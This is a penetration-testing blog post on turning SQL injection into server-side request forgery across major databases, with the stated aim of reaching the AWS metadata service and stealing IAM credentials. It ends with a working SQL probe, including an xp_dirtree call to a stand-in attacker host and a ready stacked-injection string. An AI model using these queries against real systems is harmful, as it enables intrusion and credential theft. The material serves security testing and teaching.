- Limited SSRF using master.xp_dirtree (and other file stored procedures)
- References, all URLs from the post and further reading

SQL Injection is a well known, well researched and widely publicized vulnerability that has been used to attack web applications and steal data from backend databases for decades. Post exploitation with a SQL Injection commonly yields, beyond the ability to interact with the database, the ability to read files, write files and sometimes execute operating system commands.

All modern databases have built-in functions, or the ability to create procedures, that provide some level of network access. These exist for database-related operations: fetching data from a file on a network share or on the Internet, initiating connections to other servers, and so on. As attackers, a SQL Injection often gives us the ability to interact with the database and call these functions. This is well documented in the category of data extraction techniques called out-of-band exploitation, where data is exfiltrated through DNS or HTTP channels.

This post highlights functions, packages, methods and techniques in four of the most popular RDBMS products - MySQL, MSSQL, PostgreSQL and Oracle - that can be used, either via a SQL Injection or via a direct connection to the database, to make network requests, resulting in Server Side Request Forgery (SSRF).

Imagine you have found a SQL Injection in a web application on the Internet. DNS records show that it is hosted on AWS. A SQL Injection in a web application on AWS is no different from one in any other web app, so what can you do as part of post exploitation, apart from exfiltrating data?

One of the key things that I personally go after when testing applications on AWS is the possibility that the app may allow me to interact with the instance metadata service. As an attacker, one of the ways to move from attacking the application server or the database to attacking the entire AWS infrastructure requires the ability to generate and extract credentials from the instance metadata service. There are a lot of interesting things you can do if you get your hands on the privileged tokens that the instance generates using an attached IAM role.

This is often straightforward to do from a vanilla SSRF, but is there a way to do it using a SQL Injection? This post attempts to cover some of the potential ways to make network requests, and read their responses, using nothing but SQL queries, across different database software.

We have to make some key assumptions here. Even where these assumptions do not hold, you can still perform variations of what is covered here to make the network requests.

- The backend database which the application queries and uses as its datastore is not a managed service like AWS RDS or Azure Database. These services either do not expose the full set of functions or restrict the privileges of database users, so that file and network operations are blocked by design. For example, the AWS RDS master user does not have FILE_PRIV (the FILE privilege), although the user appears to have full administrative access to the database.
- The database connector used by the application (and consequently the database itself) supports stacked (multi-statement) queries.
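Before trying any of the network-request techniques, it is worth confirming the two assumptions above from inside the database, and then running the smallest possible out-of-band probe. The following is an added example, not code from the original post: it checks that stacked queries actually reach the server, checks whether the MySQL user holds FILE_PRIV (the thing RDS strips from the master user), and issues the limited SSRF via master..xp_dirtree that the post's MSSQL section refers to. The hostname attacker.example and the table name ssrf_probe are placeholders chosen for the example.

```sql
-- Added example (not from the original post). Placeholders: attacker.example
-- is a host whose DNS and SMB traffic you can observe; ssrf_probe is a
-- scratch table name.

-- 1. Stacked queries: if the connector forwards everything after the first
--    semicolon, the INSERT runs and the SELECT returns one row. If only the
--    first statement is sent, the table never gets created and the SELECT
--    errors out. Same syntax on MySQL, PostgreSQL and MSSQL; only the driver
--    (e.g. multi-statement support being off) decides whether it works.
CREATE TABLE ssrf_probe (note VARCHAR(32));
INSERT INTO ssrf_probe VALUES ('stacked');
SELECT note FROM ssrf_probe;   -- one row, 'stacked', means stacking works
DROP TABLE ssrf_probe;

-- 2. MySQL: does the current account hold FILE_PRIV? On RDS this column is
--    'N' even for the master user, so LOAD_FILE() and SELECT ... INTO OUTFILE
--    are unavailable regardless of how "admin" the account looks.
SELECT user, host, file_priv
FROM mysql.user
WHERE CONCAT(user, '@', host) = CURRENT_USER();
-- Readable even without SELECT on mysql.user: look for FILE in the output.
SHOW GRANTS FOR CURRENT_USER();

-- 3. MSSQL: the limited SSRF. xp_dirtree lists a directory, so handing it a
--    UNC path makes the SQL Server service account resolve attacker.example
--    and open an SMB connection to it. Nothing from the remote side comes
--    back in the result set, which is why it is "limited": it confirms
--    egress (DNS lookup, TCP/445 connect) but cannot read an HTTP response.
EXEC master..xp_dirtree '\\attacker.example\share';

-- The same call stacked into an injection point in a string parameter:
--   ';EXEC master..xp_dirtree '\\attacker.example\share';--
```

The order matters: step 1 tells you whether the injection can carry the EXEC of step 3 at all, and step 2 tells you whether file-based tricks are even on the table for this user. Watch your DNS and SMB listener while step 3 runs; a lookup for attacker.example with no SMB connection usually means outbound 445 is filtered, which still confirms the name resolution channel.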